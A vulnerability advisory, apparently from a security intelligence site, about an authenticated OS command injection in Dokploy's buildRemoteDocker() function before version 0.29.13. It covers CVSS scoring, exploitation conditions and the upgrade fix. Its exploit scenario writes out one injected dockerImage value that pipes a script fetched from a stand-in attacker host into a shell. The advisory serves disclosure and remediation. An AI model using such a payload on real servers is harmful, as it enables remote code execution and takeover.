Network-reachable API requires only project-level authentication (PR:L); full RCE as server process within the same security scope (S:U); all three CIA impacts are high.

Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the buildRemoteDocker() function in packages/server/src/utils/providers/docker.ts interpolates the application-controlled dockerImage value directly into a docker pull shell command. An authenticated user with project access can set a crafted dockerImage through application.update and trigger application.deploy, causing execAsync() to execute arbitrary operating-system commands as the Dokploy server process. This issue is fixed in version 0.29.13.
AnalysisAI
OS command injection in Dokploy prior to version 0.29.13 allows any authenticated user with project write access to execute arbitrary commands as the Dokploy server process. The buildRemoteDocker() function in packages/server/src/utils/providers/docker.ts interpolates the user-controlled dockerImage field directly into a shell command passed to execAsync() without sanitization. …

Vulnerability AssessmentAI
| Exploitation | Exploitation requires: (1) a valid Dokploy account credential with project write access (PR:L per CVSS 4.0 vector - not unauthenticated); (2) API access to call application.update to set a crafted dockerImage value; (3) API access to call application.deploy to trigger the build pipeline and invoke buildRemoteDocker(). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 score of 8.7 (AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N) accurately reflects the technical severity: network-accessible, low complexity, requiring only low-privilege authenticated access, with full impact on vulnerable system confidentiality, integrity, and availability. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An authenticated Dokploy project member with write access calls the application.update API endpoint, setting the dockerImage field to a payload such as nginx:latest; curl http://attacker.example/implant.sh | sh. The attacker then calls application.deploy, which triggers buildRemoteDocker(). … |
| Remediation | Upgrade Dokploy to version 0.29.13 or later, which is confirmed by the GitHub release tag at https://github.com/Dokploy/dokploy/releases/tag/v0.29.13 and the upstream fix commit cba0b253c7de4157dd932de7f16a2ad247c7cee9. … Detailed patch versions, workarounds, and compensating controls in full report. |
